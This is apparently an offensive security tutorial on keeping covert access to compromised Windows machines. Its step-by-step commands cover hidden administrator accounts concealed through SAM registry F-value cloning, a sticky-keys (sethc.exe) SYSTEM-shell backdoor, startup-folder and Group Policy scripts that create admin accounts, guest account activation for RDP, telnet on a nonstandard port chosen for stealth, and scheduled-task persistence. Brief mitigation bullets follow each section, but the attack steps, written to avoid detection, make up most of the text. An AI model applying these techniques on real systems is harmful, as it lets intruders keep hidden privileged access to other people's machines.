Windows Persistence Techniques for Maintaining Access
Hidden Accounts
One of the most common persistence methods involves creating hidden user accounts.
First, create a hidden account via command line:
net user attacker$ P@ssw0rd /add
This account won't appear in standard net user queries.
Next, grant it administrator privileges:
net localgroup administrators attacker$ /add
However, this account remains visible in the User Accounts panel. To fully hide it, modify the registry. Open regedit and navigate to HKEY_LOCAL_MACHINE\SAM\SAM. By default, this key appears empty with restricted access. Right-click to grant the administrator read/write permissions, then restart the registry editor.
Locate the newly created account and the administrator account within the registry structure. Identify their corresponding key types. Copy the F value from the administrator's registry entry to the hidden account's F value.
Export both the hidden account and its corresponding 0000003E9 directory to .reg files for backup.
Delete the visible account:
net user attacker$ /del
Re-import the previously exported registry files. The hidden account now becomes undetectable in the User Accounts interface.
For additional stealth, revoke the administrator's permissions on the registry key. When connecting via RDP (port 3389), authentication succeeds using the hidden credentials while displaying the administrator username.
Mitigation:
- Regularly audit user accounts and critical registry locations
- Enable account logon auditing via local security policy
Shift Backdoor
The shift backdoor exploits Windows sticky keys functionality. The sethc.exe binary activates after five consecutive shift key presses. By replacing it with cmd.exe, an attacker gains a high-privilege command prompt.
Prerequisites:
Sticky keys runs under the TrustedInstaller account. Modify ownership and permissions before replacement (reference: system ownership configuration guides).
Implementation:
Navigate to C:\WINDOWS\system32 and execute:
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
This backs up the original sticky keys binary and substitutes it with the command interpreter.
Usage:
Press shift five times at the login screen or RDP interface to spawn a SYSTEM-privilege command prompt. From here, execute administrative operations:
net user backdoor$ Str0ngP@ss /add
net localgroup administrators backdoor$ /add
After establishing access, delete the temporary account to minimize detection.
Mitigation:
- Manually trigger sticky keys to verify the expected behavior
- Disable sticky keys via accessibility options or group policy
Startup Folder Persistence
Configure automatic execution during system boot. Place executable scripts in the startup directory:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Create a batch file named startup.bat:
@echo off
net user startup_usr C0mplex!23 /add
net localgroup administrators startup_usr /add
Upon restart, the script executes automatically, creating a new administrator account.
Mitigation:
- Periodically inspect the startup folder for unauthorized scripts
- Monitor for unexpected account creation events
Group Policy Startup Scripts
Alternatively, deploy startup scripts through Group Policy Editor (gpedit.msc):
Navigate to Windows Settings → Scripts (Startup/Shutdown) and add authentication scripts.
This approach offers better concealment compared to the startup folder method, as startup scripts execute silently with out user notification.
Mitigation:
- Regularly audit group policy startup scripts
- Review script contents for suspicious commands
Guest Account Activation
Windows includes a disabled guest account. Activate it with administrative privileges and enable remote access:
net user Guest /active:yes
net user Guest G3st!Access
net localgroup Administrators Guest /ADD
Configure remote desktop permissions:
gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment → Allow log on through Remote Desktop Services
Add the Guest account to this policy.
Mitigation:
- Audit guest account status and permissions regularly
- Review remote desktop user rights assignments
Telnet Service with Custom Port
Remote Desktop (RDP/3389) leaves obvious traces. Instead, configure the telnet service on a non-standard port for improved stealth.
Scenario: Target system at 192.168.1.132, attacker system at 192.168.1.3.
Step 1: Install telnet server componant on the target:
pkgmgr /iu:"TelnetServer"
Step 2: Start the telnet service:
net start tlntsvr
Step 3: Change the default port from 23 to a less obvious value (95 in this example):
tlntadmn config port =95
Restart the service for changes to take effect.
Step 4: Verify the configuration:
netstat -anp tcp | findstr 95
tlntadmn
Step 5: Enable telnet client on the attacker's system:
pkgmgr /iu:"TelnetClient"
Step 6: Connect to the target:
telnet 192.168.1.132 95
Step 7: Authenticate with valid credentials.
Step 8: Confirm the connection on the target system using network monitoring tools.
Mitigation:
- Regularly audit listening ports and running services
- Monitor for unauthorized telnet or non-standard service configurations
Scheduled Tasks
Create persistent tasks that execute based on specific triggers:
schtasks /create /sc ONLOGON /mo modifier /tr C:\Windows\System32\cmd.exe /tn persistence_task
Command Reference:
| Parameter | Description |
|---|---|
/create |
Creates a new scheduled task |
/sc <schedule> |
Schedule type: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE |
/mo <modifier> |
Frequency within the schedule type |
/tr <TaskRun> |
Program or command to execute |
/tn <TaskName> |
Unique task identifier |
Common Configurations:
Run a task every minute:
schtasks /create /sc MINUTE /mo 1 /tn sys_monitor /tr "C:\\Temp\\monitor.exe"
Run a task every hour:
schtasks /create /sc HOURLY /mo 1 /tn sys_monitor /tr "C:\\Temp\\monitor.exe"
Run a task daily:
schtasks /create /sc DAILY /mo 1 /tn sys_monitor /tr "C:\\Temp\\monitor.exe"
Run a task weekly:
schtasks /create /sc WEEKLY /mo 1 /tn sys_monitor /tr "C:\\Temp\\monitor.exe"
Remove a scheduled task:
schtasks /Delete /TN task_name /F
Mitigation:
- Review scheduled tasks periodically for suspicious entries
- Monitor
%SystemRoot%\System32\Tasksdirectory for unauthorized task definitions
